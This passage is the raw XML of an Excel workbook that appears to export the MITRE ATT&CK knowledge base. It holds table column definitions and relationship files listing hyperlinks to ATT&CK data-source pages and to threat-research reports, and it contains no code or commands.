    <tableColumn id="8" xr3:uid="{2976DCC5-1A07-4E06-8D1B-4BE555FF3E80}" name="contributors"/>
    <tableColumn id="9" xr3:uid="{05A0EB96-8BB0-4946-B44C-C2DBDEE2A61F}" name="platforms"/>
    <tableColumn id="10" xr3:uid="{D6318DB2-1BD4-437D-A664-C36B07544D9D}" name="aliases"/>
    <tableColumn id="11" xr3:uid="{70874418-0621-48D4-B1CB-C2A2EDF7453E}" name="type"/>
    <tableColumn id="12" xr3:uid="{F3F6D68C-E54C-42AA-94FD-6295E9939498}" name="relationship citations"/>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134" totalsRowShown="0">
  <autoFilter ref="A1:K134" xr:uid="{00000000-0009-0000-0100-000001000000}"/>
  <tableColumns count="11">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0000-000001000000}" name="ID"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0000-000002000000}" name="name"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0000-000003000000}" name="country"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0000-000004000000}" name="description"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0000-000005000000}" name="url"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0000-000006000000}" name="created"/>
    <tableColumn id="7" xr3:uid="{00000000-0010-0000-0000-000007000000}" name="last modified"/>
    <tableColumn id="8" xr3:uid="{00000000-0010-0000-0000-000008000000}" name="version"/>
    <tableColumn id="9" xr3:uid="{00000000-0010-0000-0000-000009000000}" name="contributors"/>
    <tableColumn id="10" xr3:uid="{00000000-0010-0000-0000-00000A000000}" name="associated groups"/>
    <tableColumn id="11" xr3:uid="{00000000-0010-0000-0000-00000B000000}" name="associated groups citations"/>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BF08291-1F88-4BDC-BF79-57348A62A8AC}" name="Table17" displayName="Table17" ref="A1:K14" totalsRowShown="0" headerRowDxfId="10" headerRowBorderDxfId="9" tableBorderDxfId="8">
  <autoFilter ref="A1:K14" xr:uid="{3BF08291-1F88-4BDC-BF79-57348A62A8AC}"/>
  <tableColumns count="11">
    <tableColumn id="1" xr3:uid="{0E5F14FB-FB66-44C7-8A70-263879B6BD06}" name="ID"/>
    <tableColumn id="2" xr3:uid="{76325232-D7EB-4FF8-9FE3-C5D37BC0B967}" name="name"/>
    <tableColumn id="3" xr3:uid="{A675BCAE-9923-4975-A8EE-B6E3104FA5A0}" name="description"/>
    <tableColumn id="4" xr3:uid="{41DAEFF7-359D-409A-B198-AFA0701C554F}" name="url" dataDxfId="7" dataCellStyle="Hyperlink"/>
    <tableColumn id="5" xr3:uid="{A9CF75E1-2883-4D55-8288-134CC6CBA248}" name="created"/>
    <tableColumn id="6" xr3:uid="{1AD9C2FA-6560-43DB-A353-D086A7235152}" name="last modified"/>
    <tableColumn id="7" xr3:uid="{9160DA1F-ADE3-4FCB-858B-B8D1F8FE8515}" name="version"/>
    <tableColumn id="8" xr3:uid="{E4408F1F-13EA-44A6-939A-5C59BA1BABE2}" name="contributors"/>
    <tableColumn id="9" xr3:uid="{0BB9E243-89EA-4F4C-ABC3-96DE482A0448}" name="associated campaigns"/>
    <tableColumn id="10" xr3:uid="{F5CEB1F1-83C4-4CDB-83D6-FE4DE9B42B3B}" name="associated campaigns citations"/>
    <tableColumn id="11" xr3:uid="{C9858986-E230-403F-B9A8-480FEC611D37}" name="relationship citations"/>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4B1EEDA-1A5C-4346-A702-792091D5F791}" name="Table18" displayName="Table18" ref="A1:H44" totalsRowShown="0" headerRowDxfId="6" headerRowBorderDxfId="5" tableBorderDxfId="4">
  <autoFilter ref="A1:H44" xr:uid="{D4B1EEDA-1A5C-4346-A702-792091D5F791}"/>
  <tableColumns count="8">
    <tableColumn id="1" xr3:uid="{DFC12C7D-A983-4EC5-AFB8-ABB039B31DAA}" name="ID"/>
    <tableColumn id="2" xr3:uid="{F7432213-81EE-4917-B394-7F8A1F8139E9}" name="name"/>
    <tableColumn id="3" xr3:uid="{5BD8B576-E016-41C9-82F4-235BB8665107}" name="description"/>
    <tableColumn id="4" xr3:uid="{B75695AE-340D-4011-9BC0-23508B6E32D2}" name="url" dataDxfId="3" dataCellStyle="Hyperlink"/>
    <tableColumn id="5" xr3:uid="{C1F271A4-8D9D-410D-8DD5-E06F55BD3B8D}" name="created"/>
    <tableColumn id="6" xr3:uid="{2885A911-15A9-40F1-A0D5-7BB0BD3278F2}" name="last modified"/>
    <tableColumn id="7" xr3:uid="{A911CE66-D95C-4EFF-949D-A156BB349A92}" name="version"/>
    <tableColumn id="8" xr3:uid="{6B7BAC7F-07E5-4F0D-9448-0C1C94E14544}" name="relationship citations"/>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4E567A5-17C0-41DD-A2FA-2C0EE84E52BB}" name="Table19" displayName="Table19" ref="A1:H15277" totalsRowShown="0" headerRowDxfId="2" headerRowBorderDxfId="1" tableBorderDxfId="0">
  <autoFilter ref="A1:H15277" xr:uid="{C4E567A5-17C0-41DD-A2FA-2C0EE84E52BB}"/>
  <tableColumns count="8">
    <tableColumn id="8" xr3:uid="{549A3A8C-60D8-4173-A96C-82BFBD1B10D0}" name="source ID"/>
    <tableColumn id="1" xr3:uid="{0B4C030A-9149-434E-8AED-A617981CD420}" name="source name"/>
    <tableColumn id="2" xr3:uid="{D98644FD-2102-49B1-A726-A25D8F876620}" name="source type"/>
    <tableColumn id="3" xr3:uid="{BA9B20AC-EFBD-42B0-8452-FF1193800CBA}" name="mapping type"/>
    <tableColumn id="4" xr3:uid="{DE1914FA-C178-435F-8946-3AE5522C6497}" name="target ID"/>
    <tableColumn id="5" xr3:uid="{5A7928F7-96DA-4D74-AFCF-F09C5B9AC83D}" name="target name"/>
    <tableColumn id="6" xr3:uid="{756F1D38-3D81-4511-ADCA-8607DB0A4562}" name="target type"/>
    <tableColumn id="7" xr3:uid="{74E2A5CA-5120-4238-B1D5-87AFF837F262}" name="mapping descriptio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ntrol" Target="../activeX/activeX1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing1.vml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/table" Target="../tables/table1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/></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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0038" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0001" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0008" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0014" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0037" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0011" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0034" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0032" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0018" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0035" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0021" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/data-sources/DS0002" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0015" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0030" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/data-sources/DS0004" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/data-sources/DS0012" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0026" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/data-sources/DS0017" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/data-sources/DS0022" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/data-sources/DS0029" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0020" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0024" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0010" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0007" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0033" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0003" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0006" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0027" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/data-sources/DS0028" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0019" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0025" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0016" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0036" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0023" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/data-sources/DS0009" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/data-sources/DS0013" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/DS0005" TargetMode="External"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet13.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1827" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit" TargetMode="External"/><Relationship Id="rId3042" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://objective-see.com/blog/blog_0x44.html" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://auth0.com/learn/refresh-tokens/" TargetMode="External"/><Relationship Id="rId987" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Neohapsis/creddump7" TargetMode="External"/><Relationship Id="rId2668" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf" TargetMode="External"/><Relationship Id="rId2875" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Password_cracking" TargetMode="External"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc" TargetMode="External"/><Relationship Id="rId847" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf" TargetMode="External"/><Relationship Id="rId1032" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BishopFox/sliver/tree/master/client/command/filesystem" TargetMode="External"/><Relationship Id="rId1477" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securingtomorrow.mcafee.com/mcafee-labs/netwire-rat-behind-recent-targeted-attacks/" TargetMode="External"/><Relationship Id="rId1684" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module" TargetMode="External"/><Relationship Id="rId1891" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/" TargetMode="External"/><Relationship Id="rId2528" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen" TargetMode="External"/><Relationship Id="rId2735" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/ics/alerts/IR-ALERT-H-16-056-01" TargetMode="External"/><Relationship Id="rId2942" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/" TargetMode="External"/><Relationship Id="rId707" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/" TargetMode="External"/><Relationship Id="rId914" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html" TargetMode="External"/><Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" TargetMode="External"/><Relationship Id="rId1544" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated" TargetMode="External"/><Relationship Id="rId1751" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/system-center/operations-manager-2005/cc180803(v=technet.10)" TargetMode="External"/><Relationship Id="rId1989" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2016/07/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/" TargetMode="External"/><Relationship Id="rId2802" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/" TargetMode="External"/><Relationship Id="rId1404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threat-intelligence/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/" TargetMode="External"/><Relationship Id="rId1611" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/turn-off-visual-basic-for-application" TargetMode="External"/><Relationship Id="rId1849" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.morphisec.com/security-alert-fin8-is-back" TargetMode="External"/><Relationship Id="rId3064" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sqlmap.org/" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://azure.microsoft.com/en-us/services/" TargetMode="External"/><Relationship Id="rId1709" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/" TargetMode="External"/><Relationship Id="rId1916" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf" TargetMode="External"/><Relationship Id="rId497" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bash.cyberciti.biz/guide/Trap_statement" TargetMode="External"/><Relationship Id="rId2080" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.qualys.com/vulnerabilities-threat-research/2022/03/01/ukrainian-targets-hit-by-hermeticwiper-new-datawiper-malware" TargetMode="External"/><Relationship Id="rId2178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass" TargetMode="External"/><Relationship Id="rId2385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/russian-targeting-gov-business" TargetMode="External"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities-part-2" TargetMode="External"/><Relationship Id="rId1194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/presentations/bh-usa-09/NEILSON/BHUSA09-Neilson-NetscreenDead-SLIDES.pdf" TargetMode="External"/><Relationship Id="rId2038" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mattifestation/PowerSploit" TargetMode="External"/><Relationship Id="rId2592" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://home.treasury.gov/news/press-releases/sm774" TargetMode="External"/><Relationship Id="rId2897" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.computerworld.com/article/2486903/windows-malware-tries-to-infect-android-devices-connected-to-pcs.html" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/" TargetMode="External"/><Relationship Id="rId564" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.justice.gov/opa/pr/department-justice-and-partner-departments-and-agencies-conduct-coordinated-actions-disrupt" TargetMode="External"/><Relationship Id="rId771" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://expel.com/blog/incident-report-from-cli-to-console-chasing-an-attacker-in-aws/" TargetMode="External"/><Relationship Id="rId869" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html" TargetMode="External"/><Relationship Id="rId1499" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63" TargetMode="External"/><Relationship Id="rId2245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/muddywater/88059/" TargetMode="External"/><Relationship Id="rId2452" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/security-center/writeup/2014-081811-3237-99?tabid=2" TargetMode="External"/><Relationship Id="rId424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml" TargetMode="External"/><Relationship Id="rId631" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://krebsonsecurity.com/2018/11/that-domain-you-forgot-to-renew-yeah-its-now-stealing-credit-cards/" TargetMode="External"/><Relationship Id="rId729" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/ESETresearch/status/1458438155149922312" TargetMode="External"/><Relationship Id="rId1054" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rapid7/meterpreter/tree/master/source/extensions/priv/server/elevate" TargetMode="External"/><Relationship Id="rId1261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/" TargetMode="External"/><Relationship Id="rId1359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html" TargetMode="External"/><Relationship Id="rId2105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rclone.org/" TargetMode="External"/><Relationship Id="rId2312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/" TargetMode="External"/><Relationship Id="rId2757" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" TargetMode="External"/><Relationship Id="rId2964" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html" TargetMode="External"/><Relationship Id="rId936" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html" TargetMode="External"/><Relationship Id="rId1121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/" TargetMode="External"/><Relationship Id="rId1219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/flame-bunny-frog-munch-and-beetlejuice-2/32855/" TargetMode="External"/><Relationship Id="rId1566" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1" TargetMode="External"/><Relationship Id="rId1773" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/" TargetMode="External"/><Relationship Id="rId1980" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf" TargetMode="External"/><Relationship Id="rId2617" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://documents.trendmicro.com/assets/wp/wp-two-years-of-pawn-storm.pdf" TargetMode="External"/><Relationship Id="rId2824" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.varonis.com/blog/power-automate-data-exfiltration" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf" TargetMode="External"/><Relationship Id="rId1426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/" TargetMode="External"/><Relationship Id="rId1633" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview" TargetMode="External"/><Relationship Id="rId1840" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/" TargetMode="External"/><Relationship Id="rId3086" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://objective-see.com/blog/blog_0x60.html" TargetMode="External"/><Relationship Id="rId1700" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide" TargetMode="External"/><Relationship Id="rId1938" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://objective-see.org/blog/blog_0x69.html" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/alerts/aa20-266a" TargetMode="External"/><Relationship Id="rId3013" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.apple.com/en-us/HT203998" TargetMode="External"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.cisco.com/security/talos/angler-domain-shadowing" TargetMode="External"/><Relationship Id="rId586" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/" TargetMode="External"/><Relationship Id="rId793" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml" TargetMode="External"/><Relationship Id="rId2267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations" TargetMode="External"/><Relationship Id="rId2474" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html" TargetMode="External"/><Relationship Id="rId2681" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://o365blog.com/post/bprt/" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments" TargetMode="External"/><Relationship Id="rId446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2019GlobalThreatReport.pdf" TargetMode="External"/><Relationship Id="rId653" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf" TargetMode="External"/><Relationship Id="rId1076" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/" TargetMode="External"/><Relationship Id="rId1283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 